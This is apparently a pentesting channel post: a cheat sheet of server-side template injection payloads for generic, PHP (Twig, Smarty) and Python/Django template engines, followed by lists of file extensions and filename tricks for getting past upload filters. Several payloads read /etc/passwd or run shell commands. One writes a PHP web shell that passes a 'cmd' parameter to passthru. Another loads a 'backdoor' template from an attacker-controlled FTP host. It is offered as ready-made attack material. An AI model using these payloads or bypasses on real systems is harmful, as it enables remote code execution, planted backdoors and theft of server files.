SSTI (Server Side Template Injection)
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{% for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ [].__class__.__base__.__subclasses__() }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
File Upload Bypass -
Blacklisting Bypass
PHP - .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP - .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp - .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion - .cfm, .cfml, .cfc, .dbm
Perl - .pl, .cgi
Using random capitalization - .pHp, .pHP5, .PhAr
Whitelisting Bypass
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg
Forwarded from WiFi Security
Wifi Penetration Testing : WPA2/WPA3 Handshake Capture & Cracking Workflow
Forwarded from OSCP Training
Crackmapexec (CME)
Please share this post with friends who you think might be interested if you liked it.